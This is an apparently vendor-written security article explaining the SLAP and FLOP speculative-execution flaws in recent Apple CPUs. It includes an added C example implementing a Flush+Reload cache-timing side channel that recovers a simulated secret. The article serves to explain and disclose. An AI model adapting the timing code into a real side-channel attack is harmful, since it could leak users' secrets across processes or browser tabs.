SLAP and FLOP: Complex vulnerabilities in Apple CPUs

New research shows, with working browser-based demonstrations, how hardware vulnerabilities in modern Apple CPUs can be exploited in practice.

SLAP and FLOP vulnerabilities in Apple CPUs

Researchers from universities in Germany and the U.S. recently showcased an interesting attack — or rather, two attacks — exploiting two different vulnerabilities in Apple CPUs. Picture this: someone sends you a link in a chat. When you click it, nothing looks suspicious at first. It doesn’t ask for your work email password, doesn’t try to get you to download a sketchy file. The page might even contain something fun or useful. But while you’re busy browsing it, hidden code is secretly harvesting data from another browser tab — checking your location, recent online purchases, and even stealing your emails.

The description of the attack seems simple enough, but in reality, we’re talking about a very complex attack that exploits the features of so-called speculative execution by the CPU.

Wait a minute! Haven’t we heard this before?

You just might have. The core idea of the new attacks resembles various Spectre-type attacks that exploit other, albeit somewhat similar, vulnerabilities in Intel and AMD CPUs. We’ve covered those attacks before. In 2022, four years after the first Spectre vulnerability was discovered, we concluded that there was no realistic, easy, or effective way to exploit those vulnerabilities. Although exploiting these new Apple chip vulnerabilities isn’t straightforward either, the difference this time is that the researchers have already provided fairly realistic attack scenarios and proved their feasibility. To see just how dangerous these vulnerabilities are, let’s briefly recap the basic principles behind all such attacks without getting bogged down in complicated research.

Exploiting speculative execution logic

Speculative execution means the processor starts work on instructions before it knows for certain that they will be needed, for instance before the branch condition that decides whether they run has been evaluated. Let’s draw a somewhat odd yet helpful analogy here with a car. Imagine your car starts the engine automatically every time you approach it. If you’re just passing by, the engine stops (as such, the operation is unnecessary). But if you’re about to set off driving, it’s ready to go as soon as you get in.

Similarly, a CPU can decide to run an operation speculatively. By the time the preceding computation completes, it may turn out that the program’s control flow went elsewhere and the operation was unnecessary; in that case its result is discarded. Discarded architecturally, that is: the program never sees the result, but side effects on the CPU’s internal state, such as which data was pulled into the cache along the way, are not undone. CPU designers use a variety of techniques to improve the branch predictor’s ability to forecast which instructions are most likely to execute next. To do this, they gather execution statistics: if a certain code segment is always invoked under particular conditions, it’s probable that it will be invoked under the same conditions again.

Such a computation may involve rather sensitive operations such as accessing protected memory areas containing secret data. The issue lies in the fact that even if a program shouldn’t have access to such data, it can still potentially “train” the speculative execution algorithm to access it.

Before Spectre was publicly disclosed in January 2018, this wasn’t considered a data leakage risk: whatever the CPU touched along a discarded speculative path was assumed to be invisible to the program. The researchers who discovered Spectre showed that it isn’t. A speculative access to secret data, such as encryption keys or private user data, leaves a trace in the CPU cache, and that trace can be read indirectly by performing hundreds or thousands of read operations and measuring how long each one takes. A value that is already cached loads tens of nanoseconds faster than one that has to be fetched from RAM, so an attacker can “guess” each byte of the secret by checking which of the candidate loads was the fast one.

So, there are two crucial components to a Spectre-like attack. One is the ability to trick the speculative execution algorithm into accessing a forbidden memory area. The other is the capability to read this data indirectly through a side channel.
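To make the side-channel half of this concrete, here is an added example in C; it is not code from the article or from the SLAP/FLOP researchers. It implements the classic Flush+Reload read-out: every probe line is evicted from the cache, the “victim” touches exactly one of them, and the attacker times a load of each candidate to see which one came back fast. The victim step is simulated by a direct touch of one probe line, standing in for the speculative access that a real gadget would make, so this demonstrates only the measurement side, not the predictor mistraining. The probe stride (4096 bytes per candidate byte value), the eviction-buffer size and the “half the median” noise threshold are assumptions chosen for the example.

```c
/*
 * Added example, not from the article or the SLAP/FLOP papers: the
 * Flush+Reload cache timing read-out behind Spectre-style attacks.
 * The speculative victim access is replaced by a direct touch of one
 * probe line. STRIDE, EVICT_BYTES and the decode threshold are assumptions.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#endif

#define STRIDE 4096                     /* one page per candidate byte value */
#define PROBE_BYTES (256 * STRIDE)
#define EVICT_BYTES (32 * 1024 * 1024)  /* assumed larger than the last-level cache */

static uint8_t probe[PROBE_BYTES];
static volatile uint8_t sink;            /* keeps the timed loads from being optimised away */

/* Evict every probe line from the cache: clflush on x86, buffer walk elsewhere. */
static void flush_probe(void) {
#if defined(__x86_64__) || defined(__i386__)
    for (int v = 0; v < 256; v++)
        _mm_clflush(&probe[v * STRIDE]);
    _mm_mfence();
#else
    static uint8_t *evict;
    if (!evict) evict = malloc(EVICT_BYTES);
    if (!evict) return;
    for (size_t i = 0; i < EVICT_BYTES; i += 64)
        evict[i]++;
#endif
}

/* Time one load: cycles on x86 (rdtscp), nanoseconds elsewhere. */
static uint64_t time_load(volatile uint8_t *p) {
#if defined(__x86_64__) || defined(__i386__)
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    sink = *p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
#else
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    sink = *p;
    clock_gettime(CLOCK_MONOTONIC, &b);
    int64_t ns = (int64_t)(b.tv_sec - a.tv_sec) * 1000000000LL + (b.tv_nsec - a.tv_nsec);
    return (uint64_t)ns;
#endif
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/*
 * Decode one byte from 256 load latencies: the cached candidate is the fastest.
 * Returns -1 when the fastest candidate is not below half the median latency,
 * i.e. when nothing stands out and the round should be treated as noise.
 */
int decode_leaked_byte(const uint64_t lat[256]) {
    uint64_t sorted[256];
    memcpy(sorted, lat, sizeof sorted);
    qsort(sorted, 256, sizeof sorted[0], cmp_u64);
    uint64_t median = sorted[128];

    int best = 0;
    for (int v = 1; v < 256; v++)
        if (lat[v] < lat[best]) best = v;

    return (lat[best] * 2 < median) ? best : -1;
}

/* One Flush+Reload round; the direct touch stands in for a speculative access. */
int leak_one_byte(uint8_t secret) {
    uint64_t lat[256];
    flush_probe();
    sink = probe[secret * STRIDE];       /* "victim" leaves its trace in the cache */
    for (int i = 0; i < 256; i++) {
        int v = (i * 167 + 13) & 255;    /* scrambled order defeats the hardware prefetcher */
        lat[v] = time_load(&probe[v * STRIDE]);
    }
    return decode_leaked_byte(lat);
}

int main(void) {
    const char *secret = "The Magic Words are Squeamish Ossifrage";  /* constructed */
    memset(probe, 1, sizeof probe);      /* fault the pages in so page faults are not timed */
    int hits = 0, n = (int)strlen(secret);
    for (int i = 0; i < n; i++) {
        int guess = leak_one_byte((uint8_t)secret[i]);
        if (guess >= 0) { printf("%3d: '%c'\n", i, guess); hits += (guess == secret[i]); }
        else printf("%3d: noise\n", i);
    }
    printf("recovered %d of %d bytes\n", hits, n);
    return 0;
}
```

Build with `cc -O2 flushreload.c -o flushreload` and run it. On x86 the timer is `rdtscp` and the flush is `clflush`; on other architectures the fallback is `clock_gettime` plus cache eviction, which is coarser and noisier, so expect some rounds to come back as noise there. The decoder’s refusal to guess when no candidate is clearly faster is the part worth keeping: a real attack repeats each round many times and keeps only the consistent answer.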

SLAP and FLOP attacks on Apple CPUs

The researchers from Germany and the U.S. wrote two separate papers at once — because they’d discovered two different vulnerabilities in Apple CPUs. One issue was found in the Load Address Predictor. This is one of many speculative execution systems that predicts the RAM address that a running program will most likely access. The second vulnerability was found in the Load Value Predictor system. This additionally attempts to anticipate the actual value that will be retrieved from RAM.

The researchers named the two attacks “SLAP” and “FLOP”: short for “Speculative Load Address Prediction” and “False Load Output Prediction”. Although both attacks share a common principle and produce a similar outcome, the ways the two predictors are exploited differ significantly, hence the two separate studies. In the first case, the researchers demonstrated how the Load Address Predictor could be steered into speculatively reading restricted data. In the second, no restricted data is read directly; instead the CPU is made to carry on speculatively with a value the Load Value Predictor guessed wrongly, and that mispredicted computation is what exposes sensitive information.

How dangerous are SLAP and FLOP attacks?

Nearly all Spectre-type attacks are subject to numerous limitations that hinder their practical use for malicious purposes:

  • The “malicious code” exploiting a vulnerability in the speculative execution system must be running on the same CPU core as the targeted process.
  • The ability to steal data often depends on the presence of code with certain features in the OS kernel or other software that the attacker has no control over.
  • Carrying out a remote attack over a network or through a browser is extremely difficult because measuring the instruction execution time to obtain data through a side channel becomes a lot more complicated.

Therefore, all previous attacks could be categorized as very complex, and only applicable for attempts to access highly valuable data, which means the attacker needed considerable resources to develop such an attack. All in all, that’s good news, as patching certain hardware vulnerabilities in production CPUs is either virtually impossible or associated with a substantial decrease in performance.

SLAP and FLOP open up a different perspective. They affect the latest processors made by Apple. The Load Address Predictor was introduced on desktop computers and laptops with the Apple M2 CPU model, and mobile devices with the Apple A15. The more advanced Load Value Predictor first appeared in the Apple M3 and A17, respectively.

Implementing these attacks is still a challenge. However, a key difference in this study compared to previous ones is that it immediately both proposed and verified the feasibility of practical attacks. The researchers demonstrated how SLAP and FLOP can be used to bypass multiple security layers both in the CPU and the Safari browser to gain access to sensitive data.

This alone might not be enough reason for cybercriminals to develop functional malware targeting Apple devices; however, there are other reasons why attempts to use SLAP and FLOP could be made in the wild.

Apple devices are rather well protected. Exploits allowing one to bypass an iPhone’s security system and gain access to the owner’s private data command exorbitant prices on the gray and black markets. Thus, it’s reasonable to assume that a hardware vulnerability that’s highly likely to remain at least partially unfixed will be exploited in targeted attacks when particularly valuable data is sought. It’s therefore not out of the question that we’ll see such vulnerabilities exploited in targeted attacks on Apple devices.

Tips